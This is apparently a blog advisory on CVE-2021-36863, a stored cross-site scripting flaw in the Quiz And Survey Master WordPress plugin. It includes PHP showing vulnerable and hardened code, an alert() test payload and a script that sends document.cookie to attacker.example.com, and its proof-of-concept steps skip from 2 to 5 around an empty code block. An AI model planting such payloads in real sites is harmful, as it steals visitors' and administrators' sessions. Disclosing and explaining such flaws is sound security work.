In 2021, a serious security issue — CVE-2021-36863 — was found in the popular WordPress plugin “Quiz And Survey Master” (QSM), maintained by ExpressTech. This flaw could let a logged-in user with at least “contributor” rights inject malicious JavaScript into the site, affecting visitors and site owners alike.
This post explains what happened, how it works, shows code snippets for understanding (and even exploiting responsibly), and gives resources for more info.
Fixed in version: 7.3.5
With this bug, any WordPress user allowed to create quizzes (even a “contributor”) could inject JavaScript in quiz data. The code would then execute when admins or visitors viewed the affected quiz. This could steal session cookies, take over accounts, or deface your site.
How the Vulnerability Works
QSM lets users create and edit quizzes from the WordPress admin interface. In vulnerable versions, some quiz fields (like “Contact Field”) do not sanitize user input before saving to the database and later outputting it on front-end and admin pages.
So, an attacker with contributor access could input something like
```html
<script>alert('XSS by Contributor');</script>
```
If an admin later views the quiz or survey with this field, the browser runs the script. The attacker could replace the alert with something more dangerous, like stealing cookies.
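To make the two halves of the bug concrete, here is an added illustration (not QSM's own code) of the vulnerable save/render pattern beside a hardened version, plus a check that flags stored values containing markup. The option name `demo_quiz_contact_label`, the POST field `contact_field_label`, the nonce action `demo_quiz_save` and the `demo_` function names are assumptions; the real plugin's storage and field names differ.

```php
<?php
// Added example, not the plugin's code. Assumed names: option 'demo_quiz_contact_label',
// POST field 'contact_field_label', nonce action 'demo_quiz_save'.

// VULNERABLE pattern: raw input stored, raw value echoed.
function demo_save_contact_label_vulnerable() {
    // No capability check, no nonce, no sanitization: a contributor's <script> is stored as-is.
    update_option( 'demo_quiz_contact_label', $_POST['contact_field_label'] );
}
function demo_render_contact_label_vulnerable() {
    // Unescaped output: the browser runs whatever was stored, for visitors and admins alike.
    echo '<label>' . get_option( 'demo_quiz_contact_label' ) . '</label>';
}

// HARDENED pattern: authorize, verify intent, sanitize on input, escape on output.
function demo_save_contact_label_hardened() {
    // Privilege boundary: require a capability contributors do not have.
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'demo' ), '', array( 'response' => 403 ) );
    }
    // CSRF protection for the admin form (nonce action name is an assumption).
    check_admin_referer( 'demo_quiz_save' );
    // A field label is plain text: strip tags and control characters before storing.
    $label = sanitize_text_field( wp_unslash( $_POST['contact_field_label'] ?? '' ) );
    update_option( 'demo_quiz_contact_label', $label );
}
function demo_render_contact_label_hardened() {
    // Escape for the HTML context at output time, even though input was sanitized.
    echo '<label>' . esc_html( get_option( 'demo_quiz_contact_label', '' ) ) . '</label>';
}

// Clean-up aid: true when a stored label contains any HTML at all, which a plain-text
// label never should. Run it over existing quiz fields after updating the plugin.
function demo_label_contains_markup( $stored_value ) {
    // wp_kses() with no allowed tags strips all markup; a difference means markup was present.
    return wp_kses( (string) $stored_value, array() ) !== (string) $stored_value;
}
```

Calling `demo_label_contains_markup()` on every saved label lets an administrator find and clear injected content that survived the update, since patching the plugin does not remove what is already in the database.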
Proof-of-Concept Exploit
Disclaimer: *The following is for educational and testing purposes ONLY. Do not use this on sites you don’t own or have explicit permission to test.*
1. Log in as a user with contributor role or higher.
2. Go to “Quizzes/Surveys” → Add New or Edit an existing quiz.
```html
```
5. Save/Publish the quiz.
When someone views the Quiz on the site — or even another admin editing it inside WordPress — the code runs!
Screenshot mockup
*(Not included here, but imagine a QSM admin page where in place of a field label you get a popup showing “QSM XSS!”)*
Exploit Code Snippet (for test environments)
Here’s some sample JavaScript you could use as a payload to demonstrate cookie theft (again, JUST FOR TESTING ON YOUR OWN SITES):
```html
<script>
// Stray semicolon removed from the original snippet so the concatenation parses.
fetch('https://attacker.example.com/steal?cookie=' + document.cookie);
</script>
```
This would send the cookie of anyone viewing the quiz to the attacker’s server.
Real-World Impact
1. Account Hijacking: If an admin gets their session cookie stolen, the attacker can access the backend.
2. Malware Spread: Injected scripts could exploit site visitors, showing fake login forms, redirecting to phishing, or loading malware.
3. Reputation Damage: Search engines or browsers may block your site for malicious content.
4. Persistence: Even if the attacker’s account is removed, injected scripts remain until the quiz content is cleaned up.
References
- WPScan Vulnerability Entry
- NVD National Vulnerability Database
- Wordfence Blog - QSM Stored XSS
- Official QSM Changelog
Conclusion
CVE-2021-36863 is a good example of why *every* data input field in WordPress needs escaping and sanitization — and why privilege boundaries matter. Even a trusted user with “contributor” rights can be the source of a big problem.
If you run Quiz And Survey Master, check your version, update ASAP, and clean up vulnerable fields! For more details, always refer to the official sources and keep your plugins up-to-date.
---
Timeline
Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:45:00 UTC